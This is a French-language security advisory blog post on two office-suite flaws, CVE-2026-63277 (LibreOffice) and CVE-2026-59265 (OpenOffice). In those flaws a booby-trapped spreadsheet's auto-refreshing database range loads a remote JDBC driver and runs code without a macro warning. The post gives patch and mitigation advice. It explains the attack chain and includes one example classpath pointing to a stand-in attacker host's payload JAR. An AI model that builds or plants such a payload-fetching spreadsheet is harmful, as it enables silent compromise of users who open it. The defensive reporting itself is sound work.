CVE-2026-63277 (LibreOffice, CVSS 8.5) et CVE-2026-59265 (OpenOffice) : un tableur piégé exécute du code arbitraire sans avertissement macro. LibreOffice corrigé en v26.2.5/26.8.0 ; OpenOffice toujours vulnérable.
En bref
- CVE-2026-63277 (LibreOffice, CVSS 8.5) et CVE-2026-59265 (OpenOffice) : un tableur malveillant exécute du code arbitraire sans aucun avertissement macro
- LibreOffice corrigé dans les versions 26.2.5 et 26.8.0 (5 octobre 2026) ; Apache OpenOffice ≤ 4.1.16 toujours vulnérable, patch 4.1.17 encore en test
- Condition : support Java activé dans la suite bureautique ; un PoC fonctionnel est publiquement disponible
Les faits
Le 5 octobre 2026, des chercheurs en sécurité ont révélé deux vulnérabilités affectant LibreOffice et Apache OpenOffice. CVE-2026-63277 (LibreOffice, CVSS 8,5) et CVE-2026-59265 (OpenOffice) permettent à un fichier tableur malveillant d'exécuter du code arbitraire au simple fait d'ouvrir le document, sans qu'aucun avertissement de type « activer les macros » ne s'affiche. La divulgation a été couverte par The Hacker News et securityonline.info, qui a publié les détails techniques et un PoC fonctionnel.
La différence majeure entre les deux cas : LibreOffice a publié des correctifs le 5 octobre 2026 dans ses versions 26.2.5 et 26.8.0. Apache OpenOffice n'a pas encore de correctif disponible. La version 4.1.17, qui doit contenir le correctif, est encore en phase de test. Toutes les versions d'OpenOffice jusqu'à la version 4.1.16 incluse — la totalité des versions actuellement distribuées — sont donc vulnérables.
Le mécanisme d'attaque repose sur une fonctionnalité légitime du composant tableur Calc : la « plage de base de données » (database range). Cette fonctionnalité associe une plage de cellules à une source de données externe et la rafraîchit automatiquement à intervalles réguliers. Un fichier tableur malveillant configure une telle plage pour se rafraîchir toutes les secondes après l'ouverture, en pointant vers un document de base de données (.odb) distant hébergé sur un serveur contrôlé par l'attaquant.
Ce document .odb désigne un driver de base de données Java (JDBC) et fournit un classpath pour le charger. Ce classpath peut contenir une URL de type jar:http://attaquant.example.com/payload.jar. Dès que le tableur actualise sa plage de données — automatiquement une seconde après l'ouverture — le moteur Java télécharge silencieusement le fichier JAR depuis le serveur de l'attaquant et l'exécute dans le contexte de l'utilisateur courant. Aucune boîte de dialogue, aucun avertissement, aucune interaction requise.
Ce qui rend cette vulnérabilité particulièrement insidieuse : l'absence totale d'avertissement utilisateur. Les suites bureautiques affichent normalement un bandeau pour activer les macros avant tout script embarqué. Ici, l'attaque contourne intégralement ce mécanisme en exploitant une fonctionnalité de données externe et non une macro. Du point de vue de l'utilisateur, rien ne se passe à l'ouverture. En arrière-plan, le code de l'attaquant s'exécute et peut installer un backdoor, exfiltrer des fichiers, ou déposer un ransomware.
La condition nécessaire est que le support Java soit activé dans LibreOffice ou OpenOffice. Ce n'est pas toujours la configuration par défaut, mais Java est fréquemment activé dans les environnements d'entreprise pour des raisons de compatibilité avec certaines extensions ou fonctionnalités avancées. Les utilisateurs sans Java activé ne sont pas exposés à cette variante d'exploitation.
Le vecteur de distribution le plus probable est le phishing : un email contenant un fichier .ods ou .xlsx apparemment bénin — rapport mensuel, facture, planning RH — envoyé à des employés. Si la machine destinataire utilise OpenOffice (ou LibreOffice non patché) avec Java activé et dispose d'un accès internet sortant, l'ouverture suffit à la compromettre. La nécessité de contacter un serveur distant lors de l'ouverture constitue un point de contrôle : un proxy d'inspection TLS ou un filtrage DNS strict peut bloquer l'exploitation dans les environnements bien configurés.
Apache OpenOffice reste l'outil bureautique de référence dans de nombreuses administrations publiques, collectivités et organisations à budget contraint en Europe. Sa réputation d'alternative gratuite lui assure une base d'utilisateurs significative dans des environnements où les mises à jour logicielles ne sont pas automatisées et où les cycles de validation peuvent prendre plusieurs semaines. L'absence de correctif disponible crée une fenêtre d'exposition potentiellement longue pour ces organisations.
Un PoC (proof of concept) fonctionnel a été publié par des chercheurs de securityonline.info, confirmant la faisabilité pratique de l'attaque. À ce stade, aucune exploitation active dans la nature n'a été rapportée, mais la disponibilité publique du PoC raccourcit considérablement le délai avant la première exploitation réelle.
Impact et exposition
Tout utilisateur de LibreOffice sur une version antérieure à 26.2.5 ou 26.8.0 est vulnérable si Java est activé. Tout utilisateur d'Apache OpenOffice jusqu'à la version 4.1.16 incluse est vulnérable dans les mêmes conditions. Les systèmes Windows, Linux et macOS sont concernés. Les administrations publiques et collectivités utilisant OpenOffice comme suite bureautique principale présentent le risque le plus élevé, notamment si leurs postes ne sont pas derrière un proxy filtrant les connexions sortantes.
Recommandations
- Mettre à jour LibreOffice immédiatement vers les versions 26.2.5 ou 26.8.0
- Pour OpenOffice : désactiver le support Java (Outils > Options > OpenOffice.org > Java, décocher « Utiliser un environnement d'exécution Java ») en attendant la version 4.1.17 ; envisager une migration vers LibreOffice patché
- Renforcer le filtrage proxy des connexions sortantes pour bloquer les requêtes HTTP initiées par des processus bureautiques vers des destinations inconnues
- Sensibiliser les utilisateurs à ne pas ouvrir des fichiers tableurs reçus de sources non vérifiées, même en l'absence d'avertissement de sécurité visible
- Vérifier via GPO ou script de déploiement quels postes du parc ont Java activé dans leur suite bureautique et prioriser ces machines
Alerte critique
Un PoC public existe pour CVE-2026-63277 et CVE-2026-59265. Apache OpenOffice n'a toujours pas de correctif. Les organisations avec OpenOffice et Java activé doivent agir immédiatement : désactiver Java dans les paramètres de la suite et filtrer les connexions HTTP/HTTPS sortantes des processus bureautiques.
Comment vérifier si Java est activé dans LibreOffice ou OpenOffice sur mon parc ?
Sur un poste individuel, allez dans Outils > Options > (LibreOffice ou OpenOffice.org) > Java. Si la case « Utiliser un environnement d'exécution Java » est cochée, Java est activé. Pour auditer un parc Windows en masse, cherchez la clé de registre HKCU\Software\LibreOffice\ et la valeur JavaEnable. Un déploiement GPO de la valeur à 0 désactive Java sur l'ensemble du parc et élimine ce vecteur d'attaque.
Votre parc bureautique est-il exposé ?
Ayi NEDJIMI réalise des audits de sécurité ciblés pour identifier et corriger vos vulnérabilités avant qu'elles ne soient exploitées.
Demander un auditÀ propos de l'auteur
Ayi NEDJIMI
Auditeur Senior Cybersécurité & Consultant IA
Expert Judiciaire — Cour d'Appel de Paris
Habilitation Confidentiel Défense
ayi@ayinedjimi-consultants.fr
Ayi NEDJIMI est un vétéran de la cybersécurité avec plus de 25 ans d'expérience sur des missions critiques. Ancien développeur Microsoft à Redmond sur le module GINA (Windows NT4) et co-auteur de la version française du guide de sécurité Windows NT4 pour la NSA.
À la tête d'Ayi NEDJIMI Consultants, il réalise des audits Lead Auditor ISO 42001 et ISO 27001, des pentests d'infrastructures critiques, du forensics et des missions de conformité NIS2 / AI Act.
Conférencier international (Europe & US), il a formé plus de 10 000 professionnels.
Domaines d'expertise
Ressources & Outils de l'auteur
Articles connexes
Ransomware à l'Université d'Osaka : 500 serveurs hors ligne, 130 000 personnes exposées
L'Université Métropolitaine d'Osaka (Japon) frappée par un ransomware les 3-4 octobre 2026 : environ 500 serveurs hors ligne, 130 000 données personnelles exposées, cours annulés, sauvegardes partiellement chiffrées.
CVE-2026-21589 : Atlassian Data Center, lecture de fichiers sans auth sur 8 produits
CVE-2026-21589, CVSS 9.3 : une faille path traversal permet à un attaquant non authentifié de lire des fichiers sensibles dans 8 produits Atlassian Data Center. Patch disponible depuis le 5 octobre 2026.
Patch Tuesday octobre 2026 : 1 CVE Exchange Server corrigée
Le Patch Tuesday d'octobre 2026 est exceptionnellement léger : 1 seule CVE corrigée (CVE-2026-96940, CVSS 8.8) ciblant Exchange Server on-premises. Aucun zero-day, 0 critique — mais l'exploitation est jugée probable par Microsoft.
Un projet cybersécurité ? Parlons-en.
Pentest, conformité NIS 2, ISO 27001, audit IA, RSSI externalisé… nos experts répondent sous 24h pour évaluer votre besoin et vous proposer un accompagnement sur mesure.
Commentaires (1)
Laisser un commentaire